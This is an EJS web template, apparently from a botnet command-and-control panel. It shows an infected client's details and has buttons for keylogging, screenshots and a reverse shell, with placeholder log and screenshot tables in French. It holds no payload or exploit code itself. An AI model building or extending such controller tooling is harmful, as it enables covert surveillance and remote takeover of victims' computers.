<%- include('../partials/header'); %>
    <%- include('../partials/navbar'); %>

    <div class="container-fluid">
        <h3 class="text-center">UUID : <%= single_client.uuid %></h3>

        <%
            const yearUpdate = single_client.updatedAt.getFullYear()
            const monthUpdate = (single_client.updatedAt.getMonth() < 9 ? '0' : '') + (single_client.updatedAt.getMonth() + 1)
            const dayUpdate = single_client.updatedAt.getDate()
            const hoursUpdate = (single_client.updatedAt.getHours() < 9 ? '0' : '') + (single_client.updatedAt.getHours())
            const minutesUpdate = (single_client.updatedAt.getMinutes() < 9 ? '0' : '') + (single_client.updatedAt.getMinutes()) 
            const clientUpdateDate = yearUpdate + '-' + monthUpdate + '-' + dayUpdate + ' ' + hoursUpdate + ':' + minutesUpdate

            const yearInfection = single_client.createdAt.getFullYear()
            const monthInfection = (single_client.createdAt.getMonth() < 9 ? '0' : '') + (single_client.createdAt.getMonth() + 1)
            const dayInfection = single_client.createdAt.getDate()
            const hoursInfection = (single_client.createdAt.getHours() < 9 ? '0' : '') + (single_client.createdAt.getHours())
            const minutesInfection = (single_client.createdAt.getMinutes() < 9 ? '0' : '') + (single_client.createdAt.getMinutes()) 
            const clientInfectionDate = yearInfection + '-' + monthInfection + '-' + dayInfection + ' ' + hoursInfection + ':' + minutesInfection
        %>

        <div class="card">
            <div class="card-body">
                <div class="row justify-content-center align-items-center">
                    <div class="col-4">
                        <img class="" src="/static/img/botnet_logo.png" alt="Flag Country">
                    </div>
                    <div class="col-4">
                        <div>
                            Computer Name : <%= single_client.computerName %>
                        </div>
                        <div>
                            IP Address : 127.0.0.1 (France)
                        </div>
                        <div>
                            Date Infection : <%= clientInfectionDate %>
                        </div>
                        <div>
                            Last Update : <%= clientUpdateDate %>
                        </div>
                    </div>
                </div>
            </div>
        </div>

        <div class="d-grid gap-2 d-md-flex justify-content-around mt-4">
            <button class="btn btn-secondary btn-command" type="button" data-uuid="<%= single_client.uuid %>" data-command="keylogs">Keylogs</button>
            <button class="btn btn-secondary btn-command" type="button" data-uuid="<%= single_client.uuid %>" data-command="screenshot">Screenshot</button>
            <button class="btn btn-secondary btn-command" type="button" data-uuid="<%= single_client.uuid %>" data-command="reverse-shell">Reverse Shell</button>
        </div>

        <div class="row mt-5 justify-content-around">
            <div class="card col-6">
                <div class="card-header">Logs</div>
                <div class="card-body">
                    <table class="table table-striped table-hover table-light">
                        <thead class="thead-dark">
                            <tr>
                                <th scope="col">ID</th>
                                <th scope="col">Application</th>
                                <th scope="col">Logs</th>
                                <th scope="col">Date</th>
                                <th scope="col">Path ???</th>
                            </tr>
                        </thead>
                        <tbody>
                            <tr>
                                <th scope="row">1</th>
                                <td>Chrome (Test)</td>
                                <td>Comment devenir riche ?</td>
                                <td>2021-06-23 12:00</td>
                                <td>Chemin ?</td>
                            </tr>
                            <tr>
                                <th scope="row">1</th>
                                <td>Chrome (Test)</td>
                                <td>Comment devenir riche ?</td>
                                <td>2021-06-23 12:00</td>
                                <td>Chemin ?</td>
                            </tr>
                            <tr>
                                <th scope="row">1</th>
                                <td>Chrome (Test)</td>
                                <td>Comment devenir riche ?</td>
                                <td>2021-06-23 12:00</td>
                                <td>Chemin ?</td>
                            </tr>
                            <tr>
                                <th scope="row">1</th>
                                <td>Chrome (Test)</td>
                                <td>Comment devenir riche ?</td>
                                <td>2021-06-23 12:00</td>
                                <td>Chemin ?</td>
                            </tr>
                        </tbody>
                    </table>
                </div>
            </div>

            <div class="card col-6">
                <div class="card-header">Screenshots</div>
                <div class="card-body">
                    <table class="table table-striped table-hover table-light">
                        <thead class="thead-dark">
                            <tr>
                                <th scope="col">ID</th>
                                <th scope="col">Aperçu</th>
                                <th scope="col">File name</th>
                                <th scope="col">Date</th>
                            </tr>
                        </thead>
                        <tbody>
                            <tr>
                                <th scope="row">1</th>
                                <td>Mini image (si faisable)</td>
                                <td>Ligne cliquable pour agrandir image</td>
                                <td>2021-06-23 12:00</td>
                            </tr>
                            <tr>
                                <th scope="row">1</th>
                                <td>Mini image (si faisable)</td>
                                <td>Ligne cliquable pour agrandir image</td>
                                <td>2021-06-23 12:00</td>
                            </tr>
                            <tr>
                                <th scope="row">1</th>
                                <td>Mini image (si faisable)</td>
                                <td>Ligne cliquable pour agrandir image</td>
                                <td>2021-06-23 12:00</td>
                            </tr>
                            <tr>
                                <th scope="row">1</th>
                                <td>Mini image (si faisable)</td>
                                <td>Ligne cliquable pour agrandir image</td>
                                <td>2021-06-23 12:00</td>
                            </tr>
                        </tbody>
                    </table>
                </div>
            </div>
        </div>

    </div>

<%- include('../partials/footer'); %>